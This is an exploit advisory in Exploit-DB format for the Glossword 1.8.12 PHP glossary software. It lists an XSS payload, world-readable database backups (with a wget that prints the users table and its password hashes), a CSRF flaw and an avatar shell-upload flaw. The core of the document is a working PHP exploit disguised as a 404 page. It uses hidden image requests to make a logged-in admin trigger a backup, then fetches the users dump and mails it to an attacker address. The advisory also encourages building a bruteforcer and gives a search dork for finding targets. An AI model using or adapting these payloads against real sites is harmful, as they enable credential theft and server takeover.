glossword 1.8.12 - Multiple Vulnerabilities

EDB-ID:

24456

CVE:



Author:

AkaStep

Type:

webapps


Platform:

PHP

Date:

2013-02-05


===================================================
Vulnerable Software: Glossword 1.8.12
Tested version: Glossword 1.8.12 
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/
Vulns: XSS && Database Backup Disclosure && CSRF &&  Shell upload.
Dork: Powered by Glossword 1.8.12 
===================================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH

===================================================
About vulns:

XSS

http://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings

===================================================

Database Backup disclosure:

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-session
session    optional     pam_umask.so umask=0067
root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -S
u=rwx,g=x,o=
# NOTE 1: Notice database backups chmod'ed to 777 by script#
# NOTICE 2: BELOW database backups is accessible via HTTP REQUESTS #

root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liash
total 1.1M
65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb  3 08:41 .
60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb  3 08:40 ..
65347  68K -rwxrwxrwx 1 hacker1user hacker1user  64K Feb  3 08:40 backup_gwnew_abbr_phrase.sql
65346  12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb  3 08:40 backup_gwnew_abbr.sql
65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user  402 Feb  3 08:40 backup_gwnew_auth_restore.sql
65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user  304 Feb  3 08:40 backup_gwnew_captcha.sql
65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb  3 08:40 backup_gwnew_component_actions.sql
65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb  3 08:40 backup_gwnew_component_map.sql
65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb  3 08:40 backup_gwnew_component.sql
65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb  3 08:40 backup_gwnew_custom_az_profiles.sql
65364  36K -rwxrwxrwx 1 hacker1user hacker1user  33K Feb  3 08:40 backup_gwnew_custom_az.sql
65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb  3 08:41 backup_gwnew_dict_example.sql
65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb  3 08:40 backup_gwnew_dict.sql
65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb  3 08:41 backup_gwnew_history_terms.sql
65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb  3 08:40 backup_gwnew_import_sessions.sql
65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user  326 Feb  3 08:41 backup_gwnew_map_user_to_dict.sql
65370  24K -rwxrwxrwx 1 hacker1user hacker1user  23K Feb  3 08:41 backup_gwnew_map_user_to_term.sql
65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb  3 08:40 backup_gwnew_pages_phrase.sql
65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb  3 08:40 backup_gwnew_pages.sql
65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user  485 Feb  3 08:40 backup_gwnew_search_results.sql
65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user  538 Feb  3 08:40 backup_gwnew_sessions.sql
65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb  3 08:40 backup_gwnew_settings.sql
65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user  321 Feb  3 08:40 backup_gwnew_stat_dict.sql
65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user  599 Feb  3 08:40 backup_gwnew_stat_search.sql
65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb  3 08:41 backup_gwnew_theme_group.sql
65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb  3 08:41 backup_gwnew_theme_settings.sql
65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb  3 08:41 backup_gwnew_theme.sql
65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user  908 Feb  3 08:40 backup_gwnew_topics_phrase.sql
65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user  761 Feb  3 08:40 backup_gwnew_topics.sql
65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb  3 08:40 backup_gwnew_users.sql
65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user  949 Feb  3 08:40 backup_gwnew_virtual_keyboard.sql
65375  32K -rwxrwxrwx 1 hacker1user hacker1user  29K Feb  3 09:03 backup_gwnew_wordlist.sql
65376  48K -rwxrwxrwx 1 hacker1user hacker1user  46K Feb  3 08:41 backup_gwnew_wordmap.sql


root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmp


root@debian:/tmp#  wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql
--2013-02-03 09:13:17--  http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3184 (3.1K) [text/plain]
Saving to: “backup_gwnew_users.sql”

100%[======================================================================================>] 3,184       --.-K/s   in 0s

2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]

SET NAMES 'utf8';
DROP TABLE IF EXISTS `gwnew_users`;
CREATE TABLE `gwnew_users` (
  `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `login` varbinary(128) NOT NULL,
  `password` char(32) NOT NULL,
  `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `date_reg` int(10) unsigned NOT NULL DEFAULT '0',
  `date_login` int(10) unsigned NOT NULL DEFAULT '0',
  `int_items` int(10) unsigned NOT NULL DEFAULT '0',
  `user_fname` varbinary(64) NOT NULL,
  `user_sname` varbinary(64) NOT NULL,
  `user_email` varchar(255) NOT NULL,
  `user_perm` blob NOT NULL,
  `user_settings` blob NOT NULL,
  PRIMARY KEY (`id_user`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;

INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);
INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',0x613a31393a7b733a31303a226176617461725f696d67223b733a31373a22313335393839373436315f73312e706870223b733a31323a226176617461725f696d675f79223b4e3b733a31323a226176617461725f696d675f78223b4e3b733a31303a22676d745f6f6666736574223b733a313a2233223b733a393a2269735f68746d6c6564223b733a313a2231223b733a31333a2269735f7573655f617661746172223b693a303b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a383a226c6f636174696f6e223b733a303a22223b733a31313a2276697375616c7468656d65223b733a393a2267775f73696c766572223b733a31323a2264696374696f6e6172696573223b613a303a7b7d733a363a2269735f647374223b693a303b733a31313a22646174655f666f726d6174223b733a31333a2246206a2c20592c20673a692061223b733a31333a22696d706f72745f666f726d6174223b733a333a22637376223b733a32313a22696d706f72745f69735f636865636b5f6578697374223b693a303b733a31393a22696d706f72745f69735f6f7665727772697465223b693a303b733a32323a22696d706f72745f69735f7370656369616c6368617273223b693a303b733a32303a22696d706f72745f69735f77686974657370616365223b693a303b733a32313a22696d706f72745f69735f636f6e766572745f657363223b693a303b733a32303a22696d706f72745f69735f726561645f6669727374223b693a303b7d);
INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);root@debian:/tmp#



In this example: backup_gwnew_users.sql     gwnew_ is my custom table prefix.In fact while installing script it is = gw_

Feel free to create your own bruteforcer:

Format is:
sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sql

Also table prefix is not panacea ANYMORE.
If Directory index is not forbidden on remote site/server you can see whole : 

site.tld/gw_export/sql_backup_2013-02Feb-03/

directory structure and you can download it in that way.


Ok this is not end.

Theris another vector of exploitation using CSRF vulnerability.

Here we go (CSRF+database dump stealer)
Simply trick the logged in admin to visit malicious page.
If the attack successfull it will silenty @mail to you victim's database.



==============EXPLOIT BEGINS=====================

<?php
error_reporting(0);

//echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d');

/*
http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/

*/
//exit;

define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/');
define("HACKERMAIL",'hacker@g00glemail.tld');
define("STANDARDTABLEPREFIX",'gw_');



header('Status: 404 Not found!');
echo '<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500);

for($i=1;$i<8;$i++)

{

echo '<img src="' .  TARGETSITE  . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL;

}

$data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';
//echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit;
//@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . 

$s=file_get_contents($data);
/*uncomment if you want to save on your server # file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/

@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL);


exit;
?>


================EXPLOIT ENDS HERE======================

Ok now about shell upload vulnerability (requires administrative access to site)
After gain access to admin panel (in eg via XSS or using backup disclosure)
Go to:

http://site.tld/gw_admin.php?a=edit-own&t=users

Upload your shell using:  Avatar settings tab.
Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information.
Trace it like this,access it and travel xD

http://s006.radikal.ru/i215/1302/27/d4b52ad33b39.png
Backup image: http://oi47.tinypic.com/crsde.jpg



================================================
                   KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep